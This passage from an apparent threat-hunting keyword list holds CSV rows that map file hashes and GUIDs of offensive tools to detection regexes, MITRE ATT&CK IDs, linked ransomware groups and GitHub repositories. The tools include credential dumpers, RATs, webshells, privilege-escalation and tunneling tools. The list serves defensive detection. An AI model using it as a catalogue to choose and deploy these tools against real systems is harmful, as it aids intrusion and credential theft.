"*f45212661e27ef359bff3c919d7f6ac16517484e650bab99eecc29866f021dcf*",".{0,1000}f45212661e27ef359bff3c919d7f6ac16517484e650bab99eecc29866f021dcf.{0,1000}","offensive_tool_keyword","SharpToken","SharpToken is a tool for exploiting Token leaks. It can find leaked Tokens from all processes in the system and use them","T1134 - T1101 - T1214 - T1087 - T1038","TA0004 - TA0007","N/A","N/A","Exploitation tool","https://github.com/BeichenDream/SharpToken","1","0","#filehash","N/A","N/A","5","467","66","2023-11-24T19:21:57Z","2022-06-30T07:34:57Z","43957" "*f458f32e49cf7c57bd3bd32e9c82217f2faab412155c9e2a7c28d1b1b4848c42*",".{0,1000}f458f32e49cf7c57bd3bd32e9c82217f2faab412155c9e2a7c28d1b1b4848c42.{0,1000}","offensive_tool_keyword","RustPotato","A Rust implementation of GodPotato - abusing SeImpersonate to gain SYSTEM privileges","T1134.001 - T1055.011","TA0004","N/A","N/A","Privilege Escalation","https://github.com/emdnaia/RustPotato","1","0","#filehash","N/A","10","1","0","0","2025-01-06T18:10:17Z","2025-01-06T19:44:57Z","43959" "*f45e8e11a4c9817e0742a79e7753377b944ef887824f94dab1cc2fa7e4771795*",".{0,1000}f45e8e11a4c9817e0742a79e7753377b944ef887824f94dab1cc2fa7e4771795.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","#filehash","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","43960" "*f463d3fbb08ed690d8d2429874bf6d36d9ac0d8e74a06439586fb4f49cbe8eac*",".{0,1000}f463d3fbb08ed690d8d2429874bf6d36d9ac0d8e74a06439586fb4f49cbe8eac.{0,1000}","offensive_tool_keyword","SirepRAT","RAT tool - Remote Command Execution as SYSTEM on Windows IoT Core","T1059 - T1219 - T1105 - T1021","TA0002 - TA0011 - 
TA0003","N/A","N/A","C2","https://github.com/SafeBreach-Labs/SirepRAT","1","0","#filehash","N/A","7","10","380","89","2020-12-13T09:52:55Z","2019-03-02T19:51:05Z","43961" "*f4653728eb40feedcce8ea91c19f00403651514c1c82c9c34c2b5e6ffb4bc7a9*",".{0,1000}f4653728eb40feedcce8ea91c19f00403651514c1c82c9c34c2b5e6ffb4bc7a9.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#filehash","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","43962" "*f4720596cdfd58bfde9ea3d21d676a3fb5722bf838007848fea8b7d9584dec8a*",".{0,1000}f4720596cdfd58bfde9ea3d21d676a3fb5722bf838007848fea8b7d9584dec8a.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","43965" "*f47ae40fa2ba9ad689d59f8b755ea68e116c3dd603d6f985a7eff273ce0f381b*",".{0,1000}f47ae40fa2ba9ad689d59f8b755ea68e116c3dd603d6f985a7eff273ce0f381b.{0,1000}","offensive_tool_keyword","DLHell","Local & remote Windows DLL Proxying","T1574.002 - T1055","TA0005 - TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/synacktiv/DLHell","1","0","#filehash","N/A","9","2","163","24","2024-06-17T16:20:10Z","2024-04-17T13:00:12Z","43966" "*f48066e445511c7fa86f1463c6e539a2f64037051e8e4410497d6df1eb3f75ad*",".{0,1000}f48066e445511c7fa86f1463c6e539a2f64037051e8e4410497d6df1eb3f75ad.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - 
T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","#filehash","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","43968" "*f4830ceea028f835f721ec2f9c84ba6d23f516be5f02aa6f53d60611fb730925*",".{0,1000}f4830ceea028f835f721ec2f9c84ba6d23f516be5f02aa6f53d60611fb730925.{0,1000}","offensive_tool_keyword","KrbRelay-SMBServer","acts as an SMB server (instead of DCOM) to relay Kerberos AP-REQ to CIFS or HTTP","T1557 - T1021 - T1205 - T1071","TA0006 - TA0008 - TA0010","N/A","Black Basta","Lateral Movement","https://github.com/decoder-it/KrbRelay-SMBServer","1","0","#filehash","N/A","9","3","215","26","2024-10-08T14:55:59Z","2024-10-05T12:28:55Z","43969" "*f48518cafb0be8696453cbb6c92dda93d76f5f67d919bd6a21e246fd68ca61b5*",".{0,1000}f48518cafb0be8696453cbb6c92dda93d76f5f67d919bd6a21e246fd68ca61b5.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","43971" "*f486fde54c5097d60c133cc75964c652d13d18dd441ea32d76fb3395327871a0*",".{0,1000}f486fde54c5097d60c133cc75964c652d13d18dd441ea32d76fb3395327871a0.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0007","N/A","N/A","Discovery","https://github.com/lkarlslund/ldapnomnom","1","0","#filehash","N/A","6","10","1030","80","2024-11-09T10:15:13Z","2022-09-18T10:35:09Z","43972" "*f487a8b9f72e87a862c6380d316e93dc4bd0a7e7087d6f430e369885db1d5d3d*",".{0,1000}f487a8b9f72e87a862c6380d316e93dc4bd0a7e7087d6f430e369885db1d5d3d.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and 
other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","#filehash","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","43973" "*f48f922e798e359c11c2692385b842a17bac0ace63e818732afc8efec71502de*",".{0,1000}f48f922e798e359c11c2692385b842a17bac0ace63e818732afc8efec71502de.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","43974" "*f490212b9f643dee26d7d2f54b4f20d0816fe6a8ee4ac59020ec46ed09e7ea4a*",".{0,1000}f490212b9f643dee26d7d2f54b4f20d0816fe6a8ee4ac59020ec46ed09e7ea4a.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. 
Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","43975" "*f49651f69f442cc4e54941b1bbfa53c3bf2680e889963dc1e2b3e8cb82695b09*",".{0,1000}f49651f69f442cc4e54941b1bbfa53c3bf2680e889963dc1e2b3e8cb82695b09.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","43977" "*f4a493d7a8c194fa599d23d6302a5bd7092fe01a60d7803688546b8cb68d8bf4*",".{0,1000}f4a493d7a8c194fa599d23d6302a5bd7092fe01a60d7803688546b8cb68d8bf4.{0,1000}","offensive_tool_keyword","Adcheck","Assess the security of your Active Directory with few or all privileges. 
This tool offers functionalities similar to PingCastle","T1087 - T1012 - T1482 - T1059 - T1203 - T1212 - T1480 - T1552 - T1112 - T1207 - T1483 - T1113 - T1057 - T1136 - T1119 - T1082 - T1553 - T1140 - T1107 - T1078 - T1562","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009","N/A","N/A","Discovery","https://github.com/CobblePot59/Adcheck","1","0","#filehash","N/A","10","4","315","35","2025-04-18T15:17:46Z","2024-05-10T13:54:45Z","43980" "*f4b50c86fa7368506ce70412d54b64ec45d4d93b6f0740b607c23a1a149eea46*",".{0,1000}f4b50c86fa7368506ce70412d54b64ec45d4d93b6f0740b607c23a1a149eea46.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","43981" "*f4c56a0ddc1228394dd2a4dd30746644af6a25e5071cb28db71cb1c8c248bef6*",".{0,1000}f4c56a0ddc1228394dd2a4dd30746644af6a25e5071cb28db71cb1c8c248bef6.{0,1000}","offensive_tool_keyword","reverse-ssh","Statically-linked ssh server with reverse shell functionality for CTFs and such","T1105 - T1572 - T1569.002 - T1090","TA0001 - TA0002 - TA0003 - TA0010 - TA0011 - TA0005 ","N/A","N/A","C2","https://github.com/Fahrj/reverse-ssh","1","0","#filehash","N/A","10","10","961","141","2023-02-15T00:16:25Z","2021-07-12T18:26:29Z","43985" 
"*f4c91aebc3bbf867adc0ade2b4d82ffd1753a396143ce8e462b6460736efdbfd*",".{0,1000}f4c91aebc3bbf867adc0ade2b4d82ffd1753a396143ce8e462b6460736efdbfd.{0,1000}","offensive_tool_keyword","Carseat","Python implementation of GhostPack Seatbelt situational awareness tool","T1012 - T1082 - T1087 - T1124 - T1217","TA0006 - TA0007 - TA0009","N/A","N/A","Collection","https://github.com/0xthirteen/Carseat","1","0","#filehash","N/A","8","3","257","21","2024-11-12T19:37:38Z","2024-11-08T02:08:53Z","43986" "*f4cd930bac7a9c0ab246d0eda53e0d7b541d3cb206687e52c5f9389c53aa5098*",".{0,1000}f4cd930bac7a9c0ab246d0eda53e0d7b541d3cb206687e52c5f9389c53aa5098.{0,1000}","offensive_tool_keyword","SharpToken","SharpToken is a tool for exploiting Token leaks. It can find leaked Tokens from all processes in the system and use them","T1134 - T1101 - T1214 - T1087 - T1038","TA0004 - TA0007","N/A","N/A","Exploitation tool","https://github.com/BeichenDream/SharpToken","1","0","#filehash","N/A","N/A","5","467","66","2023-11-24T19:21:57Z","2022-06-30T07:34:57Z","43988" "*f4d042d26b74e99f7442cbd0b9e3587f512fc6367f5759d6451d28856526db15*",".{0,1000}f4d042d26b74e99f7442cbd0b9e3587f512fc6367f5759d6451d28856526db15.{0,1000}","offensive_tool_keyword","Luna-Grabber","discord token grabber made in python","T1003 - T1056","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Smug246/Luna-Grabber","1","0","#filehash","N/A","10","","N/A","","","","43989" "*f4d29fdb47bdeb934a39cbc50f5ef589a10f08fe345b76711695f8d49ac1d627*",".{0,1000}f4d29fdb47bdeb934a39cbc50f5ef589a10f08fe345b76711695f8d49ac1d627.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","43990" 
"*f4e3039aaa1670e865d77746b6facb72dd3f72d8b240a972a6d48611b0ff4219*",".{0,1000}f4e3039aaa1670e865d77746b6facb72dd3f72d8b240a972a6d48611b0ff4219.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","43991" "*f4e47eb7ffcf1a611807ade6cfb0ed331470a311c61b660cc5df5dfa2a254e35*",".{0,1000}f4e47eb7ffcf1a611807ade6cfb0ed331470a311c61b660cc5df5dfa2a254e35.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","43992" "*f4ea99dc41cb7922d01955eef9303ec3a24b88c3318138855346de1e830ed09e*",".{0,1000}f4ea99dc41cb7922d01955eef9303ec3a24b88c3318138855346de1e830ed09e.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","Earth Lusca","Reconnaissance","https://github.com/shadow1ng/fscan","1","0","#filehash","N/A","8","10","11931","1725","2025-04-20T11:30:29Z","2020-11-13T16:35:20Z","43994" "*f4ec39cac50227d36423f1384a7144fa4faee9d29879ec5305259a676f46b290*",".{0,1000}f4ec39cac50227d36423f1384a7144fa4faee9d29879ec5305259a676f46b290.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation 
tool","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","#filehash","N/A","8","10","1254","444","2024-01-04T15:17:17Z","2021-03-10T21:34:41Z","43995" "*f4f0162579e4bc334ab0f4be1ac02fc7f459243e6b9427f68a9b18c38af48210*",".{0,1000}f4f0162579e4bc334ab0f4be1ac02fc7f459243e6b9427f68a9b18c38af48210.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","0","#filehash","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","43996" "*f4f23d5b522d8f58e46963452ce15087bcff3955bbea95306e24433dfeacbd3a*",".{0,1000}f4f23d5b522d8f58e46963452ce15087bcff3955bbea95306e24433dfeacbd3a.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","43997" "*f4f736012e96fda525525508fdfb99ddd93d1e114b1a3b616234f6c47ffb84c9*",".{0,1000}f4f736012e96fda525525508fdfb99ddd93d1e114b1a3b616234f6c47ffb84c9.{0,1000}","offensive_tool_keyword","gosecretsdump","Dump ntds.dit really fast","T1003","TA0006","N/A","Lockbit - Black Basta","Credential Access","https://github.com/C-Sto/gosecretsdump","1","0","#filehash","N/A","10","4","391","50","2021-10-01T09:11:33Z","2018-12-24T05:54:19Z","43999" "*f4fc8dabe2ba48d9d204dd0f74cae65a1eb27951664911aa116ab08446c1fb1d*",".{0,1000}f4fc8dabe2ba48d9d204dd0f74cae65a1eb27951664911aa116ab08446c1fb1d.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","44001" "*f5028addc30229d68561491b4609ddfe0b908547cf31af3b810177d14c95645b*",".{0,1000}f5028addc30229d68561491b4609ddfe0b908547cf31af3b810177d14c95645b.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","44002" "*f504340404e40fea29f2beb71c114ce3d310ca80631aff7c0f0c19198da897d4*",".{0,1000}f504340404e40fea29f2beb71c114ce3d310ca80631aff7c0f0c19198da897d4.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","44004" "*f515b31a54f823dfcef50ef4c3dbcc64e6062f5c5dc7f98b20b30c7cc0a5f3ff*",".{0,1000}f515b31a54f823dfcef50ef4c3dbcc64e6062f5c5dc7f98b20b30c7cc0a5f3ff.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/akkuman/rotateproxy","1","0","#filehash","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","44006" "*f51cdf6aff5e752276cf11830733e4ac4b69526d4031ecaee4884f2c36576c4c*",".{0,1000}f51cdf6aff5e752276cf11830733e4ac4b69526d4031ecaee4884f2c36576c4c.{0,1000}","offensive_tool_keyword","Dispossessor","hashes of AV removing scripts tools and notes from the Dispossessor ransomware group","T1562.001 - T1112 - T1059 - T1036","TA0005 - TA0040","N/A","Dispossessor","Defense Evasion","https://vx-underground.org/Archive/Dispossessor%20Leaks","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A","44007" "*f520a23b9c1baf7a7a8ccf6f71e082f337a42e07d5437356d98bcb0eceec30af*",".{0,1000}f520a23b9c1baf7a7a8ccf6f71e082f337a42e07d5437356d98bcb0eceec30af.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active 
reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043 - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","44009" "*f53acee57614581bb56dbb7af4a1de03128bbc7068bd312a5d7015eeeb48e263*",".{0,1000}f53acee57614581bb56dbb7af4a1de03128bbc7068bd312a5d7015eeeb48e263.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","44015" "*f53fce2c36ff530c68c813d8444a43f3167d32673727c447bd551ebebd9a5d80*",".{0,1000}f53fce2c36ff530c68c813d8444a43f3167d32673727c447bd551ebebd9a5d80.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043 - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","44016" "*f54554998f7c0981faa927601ff8a17b8ab48e6b8cef618df50c9f6d67c45e91*",".{0,1000}f54554998f7c0981faa927601ff8a17b8ab48e6b8cef618df50c9f6d67c45e91.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","44017" "*f54687027a34fa171337c495bbf41f5d099f580d38fb2404136b7ddd19be8dde*",".{0,1000}f54687027a34fa171337c495bbf41f5d099f580d38fb2404136b7ddd19be8dde.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - 
T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","0","#filehash","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","44018" "*f54c0294b0a07f49dc21ec7978c25cc5e75947646832675f1af782384aee911f*",".{0,1000}f54c0294b0a07f49dc21ec7978c25cc5e75947646832675f1af782384aee911f.{0,1000}","offensive_tool_keyword","SigmaPotato","SeImpersonate privilege escalation tool","T1134 - T1055 - T1543","TA0004 - TA0005 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/tylerdotrar/SigmaPotato","1","0","#filehash","N/A","9","4","326","38","2024-05-16T23:46:04Z","2023-09-09T01:35:42Z","44019" "*f54d129e29fabcb7328aac406ea5a08ba38df3fa327a5ecddff0de316a95b5c9*",".{0,1000}f54d129e29fabcb7328aac406ea5a08ba38df3fa327a5ecddff0de316a95b5c9.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","44020" "*f5523c0081af67436ef06a92aa48d12f865cea26232c074f6e8f74a52d2e9e7f*",".{0,1000}f5523c0081af67436ef06a92aa48d12f865cea26232c074f6e8f74a52d2e9e7f.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","44021" "*f55346d51dc5695d97ddc5a060ca17f20f1cde41478b2c5e45a98c9549b4a383*",".{0,1000}f55346d51dc5695d97ddc5a060ca17f20f1cde41478b2c5e45a98c9549b4a383.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - 
T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","44022" "*f55a88457981f18729ec39762c4118802327b8cb1230d29bc4ecf31eaf1af9b1*",".{0,1000}f55a88457981f18729ec39762c4118802327b8cb1230d29bc4ecf31eaf1af9b1.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","44024" "*f55b17e5f63a4f87b16061fc2d44c366bd5868c30104ef273e783c087d2ef3cb*",".{0,1000}f55b17e5f63a4f87b16061fc2d44c366bd5868c30104ef273e783c087d2ef3cb.{0,1000}","offensive_tool_keyword","DitExplorer","Tool for viewing NTDS.dit","T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/trustedsec/DitExplorer","1","0","#filehash","N/A","10","2","155","13","2025-03-14T13:02:44Z","2025-02-12T15:54:04Z","44025" "*f56888799e7efbcf2196e8f9dfa0d1adc97772ad6fee946cc59307d758a99e21*",".{0,1000}f56888799e7efbcf2196e8f9dfa0d1adc97772ad6fee946cc59307d758a99e21.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","44027" "*F56E4E1A-AB7A-4494-ACB9-8757164B0524*",".{0,1000}F56E4E1A\-AB7A\-4494\-ACB9\-8757164B0524.{0,1000}","offensive_tool_keyword","Lime-RAT","remote administration tool for Windows (RAT)","T1059 - T1573.001 - T1027 - T1091 - T1486 - T1036 - T1560 - T1566 - T1480 - T1498 - T1113 - T1083 - T1016 - T1105 - T1056 - T1021 - T1112 - T1082 - T1072 - T1076 - T1078 - T1209 - T1003 - T1012 - T1100 - T1135 - T1108 - T1029 - T1547 - T1053 - T1060 - T1102 - T1124 - T1049 - T1123 - T1145 - T1210 - T1046 - T1010 - T1055","TA0040 - TA0010 - TA0005 - TA0011 - TA0043 - TA0006 - TA0042 - TA0008 - TA0009 - TA0007 - TA0002 - TA0003","N/A","APT-C-36 - Operation Comando","Malware","https://github.com/NYAN-x-CAT/Lime-RAT","1","0","#GUIDproject","N/A","10","10","1086","413","2019-06-24T17:05:48Z","2018-02-07T15:35:56Z","44028" "*f56f11c598a47a0313a3f4e0929a45a6ed7529119189d7434fbe39721e190083*",".{0,1000}f56f11c598a47a0313a3f4e0929a45a6ed7529119189d7434fbe39721e190083.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential 
